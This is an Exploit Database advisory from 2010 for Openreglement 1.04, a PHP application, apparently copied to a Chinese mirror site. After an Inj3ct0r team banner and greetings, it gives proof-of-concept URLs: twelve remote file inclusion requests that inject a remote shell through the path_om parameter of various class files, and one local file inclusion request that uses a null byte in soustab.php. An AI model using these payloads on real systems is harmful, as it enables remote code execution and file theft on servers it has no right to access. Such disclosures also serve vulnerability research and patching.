Openreglement 1.04 – Local File Inclusion / Remote File Inclusion

• Exploit Database
• 12 阅读

• 作者： cr4wl3r
  日期： 2010-04-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12296/

• ================================================================
  Openreglement 1.04 (RFI/LFI) Multiple File Include Vulnerability
  ================================================================
  
  
  [+] Openreglement 1.04 (RFI/LFI) Multiple File Include Vulnerability
  
  1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
  0 _ __ __ __ 1
  1 /' \__/'__`\/\ \__/'__`\ 0
  0/\_, \___ /\_\/\_\ \ \___\ \ ,_\/\ \/\ \_ ___ 1
  1\/_/\ \ /' _ `\ \/\ \/_/_\_<_/'___\ \ \/\ \ \ \ \/\`'__\0
  0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
  1\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
  0 \/_/\/_/\/_/\ \_\ \/___/\/____/ \/__/ \/___/\/_/ 1
  1\ \____/ >> Exploit database separated by exploit 0
  0 \/___/type (local, remote, DoS, etc.)1
  11
  0[+] Site: Inj3ct0r.com0
  1[+] Support e-mail: submit[at]inj3ct0r.com1
  00
  1######################################1
  0I'm cr4wl3rmember from Inj3ct0r Team1
  1######################################0
  0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
  
  [+] Discovered By: cr4wl3r
  [+] Download: https://adullact.net/frs/download.php/4273/openmairie_reglement_1.04.zip
  [+] Greetz: All member inj3ct0r.com, manadocoding.net, sekuritionline.net, ggcc.web.id
  
  [+] Thanks to: opt!x hacker, xoron, cyberlog, irvian, antihack, angky.tatoki, 
   EA ngel, zvtral, s4va, bL4Ck_3n91n3, untouch, team_elite, zreg, mywisdom, 
   SENOT, kec0a, d3viln3t, p4p4y, cybertomat, etaxCrew, emen, and all my friend
  
  [+] PoC:
  
  [~] RFI:
  http://shell4u.tk/[path]/obj/accompagnants.class.php?path_om=[Shell]
  http://shell4u.tk/[path]/obj/dossier.class.php?path_om=[Shell]
  http://shell4u.tk/[path]/obj/motif_cni.class.php?path_om=[Shell]
  http://shell4u.tk/[path]/obj/utilisateur.class.php?path_om=[Shell]
  http://shell4u.tk/[path]/obj/centre.class.php?path_om=[Shell]
  http://shell4u.tk/[path]/obj/droit.class.php?path_om=[Shell]
  http://shell4u.tk/[path]/obj/motif_retour.class.php?path_om=[Shell]
  http://shell4u.tk/[path]/obj/profil.class.php?path_om=[Shell]
  http://shell4u.tk/[path]/obj/collectivite.class.php?path_om=[Shell]
  http://shell4u.tk/[path]/obj/doc_identite.class.php?path_om=[Shell]
  http://shell4u.tk/[path]/obj/mention.class.php?path_om=[Shell]
  http://shell4u.tk/[path]/obj/titre_presente_enf.class.php?path_om=[Shell]
  
  [~] LFI:
  http://shell4u.tk/[path]/scr/soustab.php?dsn[phptype]=[LFI%00]
  
  
  # Inj3ct0r.com [2010-04-20]